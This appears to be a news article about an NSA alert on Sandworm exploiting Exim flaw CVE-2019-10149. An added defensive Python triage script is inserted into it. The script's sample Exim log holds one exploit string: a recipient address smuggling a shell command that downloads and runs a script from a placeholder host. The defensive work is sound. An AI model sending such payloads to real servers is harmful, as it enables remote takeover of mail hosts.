Today, the US National Security Agency (NSA) issued a security alert warning of a new wave of cyberattacks against email servers, launched by one of Russia's most advanced cyber-espionage units.
The agency says that a division of the Russian military intelligence service has been targeting email servers running the Exim mail transfer agent (MTA).
This group, known as Sandworm, has been hacking Exim servers since August 2019 by exploiting a critical vulnerability tracked as CVE-2019-10149.
“When Sandworm exploited CVE-2019-10149, the victim machine would subsequently download and execute a shell script from a Sandworm-controlled domain,” the NSA says.
This shell script would add privileged users, disable network security settings, update SSH configurations to enable additional remote access, and execute a further script to enable follow-on exploitation, among other actions.
Private and government organizations are now being urged to update their Exim servers to version 4.93 or later and to look for indicators of compromise.
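The article carries no code. What follows is an added triage script, not the NSA's advisory code or anything from the article, that checks the things the alert above tells administrators to do or look for: whether the installed Exim build is older than 4.93, whether any account other than root carries UID 0 (the "privileged users" the Sandworm script is said to add), and whether sshd_config has been widened (PermitRootLogin yes, PermitEmptyPasswords yes, or an AuthorizedKeysFile outside the usual .ssh path). It also scans Exim mainlog lines for the `${run{` recipient-address string that public write-ups of CVE-2019-10149 identify as the exploitation marker; that string comes from those write-ups, not from this article. The version banner, passwd file, sshd_config and log lines are constructed samples, and example.invalid is a placeholder domain.

```python
"""Post-advisory triage for an Exim host (added example; not the NSA's or the
article's own code). All inputs below are constructed samples."""
import re
from typing import Dict, List, Tuple

MIN_SAFE_VERSION = (4, 93)  # version the advisory tells administrators to move to

# Recipient-address string from public write-ups of CVE-2019-10149 (assumption:
# the article itself does not describe the exploitation mechanism).
EXPLOIT_MARKER = "${run{"

# sshd_config directives whose listed values widen remote access.
BAD_SSHD_VALUES = {"permitrootlogin": {"yes"}, "permitemptypasswords": {"yes"}}
DEFAULT_KEY_FILES = {".ssh/authorized_keys", ".ssh/authorized_keys2"}


def parse_version(banner: str) -> Tuple[int, int]:
    """Pull (major, minor) from `exim -bV` output such as
    'Exim version 4.92 #3 built 11-Jun-2019'."""
    m = re.search(r"Exim version (\d+)\.(\d+)", banner)
    if not m:
        raise ValueError("no Exim version found in banner")
    return int(m.group(1)), int(m.group(2))


def version_is_vulnerable(banner: str) -> bool:
    """True when the build predates the 4.93 the advisory asks for."""
    return parse_version(banner) < MIN_SAFE_VERSION


def unexpected_root_accounts(passwd_text: str, expected=("root",)) -> List[str]:
    """Accounts with UID 0 other than the expected ones."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] not in expected:
            found.append(fields[0])
    return found


def risky_sshd_settings(sshd_config: str) -> List[str]:
    """Directives that broaden SSH access: bad values for known keys, or an
    AuthorizedKeysFile pointing somewhere other than the default locations."""
    findings = []
    for raw in sshd_config.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key in BAD_SSHD_VALUES and value.lower() in BAD_SSHD_VALUES[key]:
            findings.append(line)
        elif key == "authorizedkeysfile":
            for path in value.split():
                if path not in DEFAULT_KEY_FILES:
                    findings.append(f"AuthorizedKeysFile {path}")
    return findings


def suspicious_log_lines(mainlog: str) -> List[str]:
    """Exim mainlog lines carrying the exploitation marker in a recipient."""
    return [line for line in mainlog.splitlines() if EXPLOIT_MARKER in line]


def triage(banner: str, passwd: str, sshd_config: str, mainlog: str) -> Dict[str, object]:
    """Run every check and return the findings as one dictionary."""
    return {
        "vulnerable_version": version_is_vulnerable(banner),
        "extra_root_accounts": unexpected_root_accounts(passwd),
        "risky_sshd": risky_sshd_settings(sshd_config),
        "exploit_attempts": suspicious_log_lines(mainlog),
    }


# ---- constructed sample inputs (not real host data) ----
SAMPLE_BANNER = "Exim version 4.92 #3 built 11-Jun-2019"
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
exim:x:107:113::/var/spool/exim4:/usr/sbin/nologin
mysql_db:x:0:0::/root:/bin/bash
"""
SAMPLE_SSHD_CONFIG = """Port 22
PermitRootLogin yes
PasswordAuthentication no
AuthorizedKeysFile .ssh/authorized_keys /tmp/.k
"""
SAMPLE_MAINLOG = """2019-08-11 02:10:03 1hx7V8-0001bq-AB <= alice@example.org H=mail.example.org [198.51.100.7] P=esmtp S=2311
2019-08-11 02:11:45 H=(localhost) [203.0.113.5] F=<> rejected RCPT <${run{/bin/sh -c 'curl example.invalid/i|sh'}}@localhost>
"""

if __name__ == "__main__":
    for name, value in triage(SAMPLE_BANNER, SAMPLE_PASSWD, SAMPLE_SSHD_CONFIG, SAMPLE_MAINLOG).items():
        print(f"{name}: {value}")
```

On a real host, feed `triage()` the output of `exim -bV`, the contents of /etc/passwd and /etc/ssh/sshd_config, and the Exim mainlog; a clean result is all-empty lists and `vulnerable_version` False. A hit on any of the host checks is worth treating as a compromise rather than a misconfiguration, since the advisory ties exactly these changes to post-exploitation activity.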
Active since the mid-2000s, the Sandworm group is thought to be the hacker group behind the BlackEnergy malware and the attacks that caused blackouts in Ukraine in December 2015 and again in December 2016.
The CVE-2019-10149 vulnerability was disclosed in June 2019 and codenamed "Return of the WIZard."
Within a week of its disclosure, hacking groups had started exploiting it. Two weeks later, Microsoft issued its own warning, informing Azure customers that an attacker had built a self-spreading Exim worm that abused the flaw to take over Exim servers running on Azure.
“Many orgs fixate on the new and shiny, like cloud and mobile. However, they forget that really old services like SMTP run a big chunk of their personal and business lives, and by definition those services are Internet-exposed,” Richard Bejtlich, Principal Security Strategist at cyber-security firm Corelight, said.
“They make perfect targets for adversaries as they face the Internet, they handle the most sensitive data, and people treat them like appliances, meaning they are often forgotten so long as they continue working, and are not monitored.”